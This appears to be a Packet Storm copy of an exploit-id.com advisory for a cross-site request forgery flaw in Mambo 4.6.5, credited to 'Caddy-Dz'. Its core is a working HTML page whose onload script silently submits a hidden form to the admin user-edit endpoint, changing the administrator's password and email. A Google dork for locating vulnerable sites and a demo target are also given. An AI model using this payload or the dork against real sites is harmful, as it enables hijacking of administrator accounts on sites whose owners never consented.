Mambo version 4.6.5 change administrator password cross site request forgery exploit.
33210870b783bd5b22a50a18809dbb0e702e2a5f59cdb4ccd8e080d8506199ab=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure
Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: Mambo 4.6.5 CSRF Vuln (Change Admin Password)
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Mambo is Free Software released under the GNU/GPL License."
# Category:: Webapps
# Tested on: [Windows Seven Edition Intégral- French]
####
[+] Demo :
http://www.opensourcecms.com/demo/1/43/Mambo
[*] ExpLo!T :
<html>
<head>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
function fireForms()
{
var count = 1;
var i=0;
for(i=0; i<count; i++)
{
document.forms[i].submit();
}
}
</script>
<form action="http://site.com/administrator/index.php?option=com_users&task=editA&id=62&hidemainmenu=1" method="post" name="adminForm">
<input type="hidden" name="name" value="Administrator" />
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="password2" value="" />
<input type="hidden" name="gid" value="25" />
<input type="radio" name="block" value="0" checked="checked" />
<input type="radio" name="block" value="1" />
<input type="radio" name="sendEmail" value="0" />
<input type="radio" name="sendEmail" value="1" checked="checked" />
</form>
####
[+] Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others |
============================================================================================ |
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed